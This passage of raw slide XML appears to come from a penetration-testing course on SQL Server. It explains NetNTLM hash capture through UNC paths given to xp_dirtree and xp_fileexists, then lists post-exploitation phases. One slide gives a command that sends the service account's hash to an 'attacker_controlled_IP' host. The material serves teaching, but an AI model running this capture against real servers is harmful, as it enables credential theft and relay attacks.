              <a:t> UNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>utilized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> on SQL Server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>grabbed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>grabbed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>testers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL server to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>authenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>capture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>NetNTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>crack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>offline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Public role, by default, has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>xp_fileexists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Subsequently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> public role has direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>NetNTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, by default.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FBAAC1-3562-B746-8E01-9D0065E7778D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5051723"/>
            <a:ext cx="11041227" cy="3181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467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLServiceAccountPwHashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>TimeOut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 20 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CaptureIp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>attacker_controlled_IP</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1467"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385533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F5FE-C785-9440-9489-0EB9F66D19D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>wrapup</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8E01B2-B4FC-EB4A-95D4-3938A2C38C56}"/>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341456AE-BF02-0542-BC39-68D473844220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="359702" y="1213012"/>
            <a:ext cx="11472597" cy="4913152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376263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ACF8-1E19-7D41-8C4A-AC0DBBF27A28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> post-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>activities</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D2F16B-D1E0-CA4D-B1B8-3DBC8E01E0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> post-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>activities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>consist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>three</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>phases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Persistence </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Sensitive Data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>hashes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
